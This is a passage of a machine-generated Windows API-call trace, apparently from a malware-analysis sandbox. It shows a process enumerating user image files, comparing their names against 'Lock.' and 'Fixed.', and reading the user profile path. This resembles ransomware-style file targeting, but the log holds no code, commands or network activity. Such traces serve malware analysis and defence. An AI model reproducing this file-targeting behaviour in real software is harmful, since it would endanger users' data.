ftLastAccessTime.dwHighDateTime=0x1d4d021, ftLastWriteTime.dwLowDateTime=0xe93e2810, ftLastWriteTime.dwHighDateTime=0x1d4d021, nFileSizeHigh=0x0, nFileSizeLow=0x18374, dwReserved0=0x34aa4d8, dwReserved1=0x25c6e50, cFileName="QrlF.gif", cAlternateFileName="")) returned 1 [0254.388] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.388] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.388] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.388] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.388] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.388] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9256b960, ftCreationTime.dwHighDateTime=0x1d4c9f3, ftLastAccessTime.dwLowDateTime=0xd4867660, ftLastAccessTime.dwHighDateTime=0x1d4caaa, ftLastWriteTime.dwLowDateTime=0xd4867660, ftLastWriteTime.dwHighDateTime=0x1d4caaa, nFileSizeHigh=0x0, nFileSizeLow=0x2c40, dwReserved0=0x34aa370, dwReserved1=0x25c6e50, cFileName="SLYhvryE1GJ5.png", cAlternateFileName="SLYHVR~1.PNG")) returned 1 [0254.388] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.388] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.388] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.388] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.389] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.389] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29a001f0, ftCreationTime.dwHighDateTime=0x1d4d020, ftLastAccessTime.dwLowDateTime=0x464cd3a0, ftLastAccessTime.dwHighDateTime=0x1d4cd1e, ftLastWriteTime.dwLowDateTime=0x464cd3a0, ftLastWriteTime.dwHighDateTime=0x1d4cd1e, nFileSizeHigh=0x0, nFileSizeLow=0xe5f1, dwReserved0=0x34aa6a0, dwReserved1=0x25c6e50, cFileName="Ur-fU4s.jpg", cAlternateFileName="")) returned 1 [0254.389] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.389] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.389] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.389] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.389] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.389] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79631700, ftCreationTime.dwHighDateTime=0x1d4c782, ftLastAccessTime.dwLowDateTime=0x2fdb3700, ftLastAccessTime.dwHighDateTime=0x1d4d35a, ftLastWriteTime.dwLowDateTime=0x2fdb3700, ftLastWriteTime.dwHighDateTime=0x1d4d35a, nFileSizeHigh=0x0, nFileSizeLow=0xd25, dwReserved0=0x34aa4d8, dwReserved1=0x25c6e50, cFileName="VLD3Nk1TIwkGNmyGPC.bmp", cAlternateFileName="VLD3NK~1.BMP")) returned 1 [0254.389] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.389] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.389] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.389] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.389] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.389] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2379e0, ftCreationTime.dwHighDateTime=0x1d4cbf9, ftLastAccessTime.dwLowDateTime=0x320258a0, ftLastAccessTime.dwHighDateTime=0x1d4c668, ftLastWriteTime.dwLowDateTime=0x320258a0, ftLastWriteTime.dwHighDateTime=0x1d4c668, nFileSizeHigh=0x0, nFileSizeLow=0x11565, dwReserved0=0x34aa370, dwReserved1=0x25c6e50, cFileName="waKMSqrywnXqjmY3STm.bmp", cAlternateFileName="WAKMSQ~1.BMP")) returned 1 [0254.390] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.390] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.390] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.390] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.390] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.390] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x25c6d68, ftCreationTime.dwHighDateTime=0x25c6a58, ftLastAccessTime.dwLowDateTime=0x10, ftLastAccessTime.dwHighDateTime=0x24b1468, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x240d790, nFileSizeHigh=0x25c6a58, nFileSizeLow=0x25c6b70, dwReserved0=0x34aa6a0, dwReserved1=0x25c6e50, cFileName="\x25b9\x34\xf1dc\x8b\x6e5a\x01\xff78\x8b\x1ecd\x771a\x25b9\x34\xfffe\xffff\xe36c\x7715\xe0d2\x7715\x9870\x24a\xa4d8\x34a\x10", cAlternateFileName="\x8e1a\x40\x8154\x241\xf47c\x8b\x8614\x4a\x3cfb\x40\x8178\x4a\xf580\x8b\xf484\x8b\x3d76\x40\xf4a0\x8b\xf580\x8b\x85f4\x4a\x61")) returned 0 [0254.390] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.390] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.390] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0254.391] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.391] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.391] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.391] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.391] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-6 V-28Zs1i2mga0e.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6 V-28Zs1i2mga0e.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" V-28Zs1i2mga0e.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V-28Zs1i2mga0e.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0254.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-28Zs1i2mga0e.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.392] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="28Zs1i2mga0e.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.392] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8Zs1i2mga0e.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.392] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zs1i2mga0e.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0254.392] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s1i2mga0e.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0254.392] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1i2mga0e.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.392] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i2mga0e.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.392] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2mga0e.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.392] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mga0e.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0254.392] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ga0e.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.392] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a0e.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.392] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0e.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.392] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0254.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0254.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0254.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0254.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0254.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0254.393] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0254.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.393] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-6 V-28Zs1i2mga0e.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0254.393] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6 V-28Zs1i2mga0e.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0254.393] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" V-28Zs1i2mga0e.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0254.393] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V-28Zs1i2mga0e.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-28Zs1i2mga0e.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0254.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="28Zs1i2mga0e.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0254.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8Zs1i2mga0e.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0254.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zs1i2mga0e.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s1i2mga0e.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1i2mga0e.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0254.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i2mga0e.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2mga0e.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0254.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mga0e.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ga0e.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a0e.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0254.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0e.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0254.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0254.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b39d0 | out: hHeap=0x25c0000) returned 1 [0254.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0254.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0254.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0254.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0254.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0254.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0254.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0254.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0254.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0254.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0254.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0254.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0254.395] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.396] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0254.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0254.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0254.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.396] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0254.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0254.396] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0254.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0254.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0254.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0254.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0254.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0254.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0254.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0254.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0254.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0254.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0254.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0254.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0254.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0254.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0254.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0254.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0254.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0254.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0254.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0254.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0254.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0254.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0254.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0254.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0254.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0254.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0254.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2de8 [0254.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0254.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0254.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0254.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0254.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0254.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0254.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0254.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0254.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0254.398] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0254.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0254.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0254.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0254.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0254.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0254.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0254.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0254.399] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0254.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0254.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0254.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0254.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0254.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0254.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0254.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0254.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0254.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0254.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0254.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0254.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0254.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0254.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0254.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0254.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0254.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0254.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0254.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0254.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0254.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0254.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0254.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0254.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0254.400] 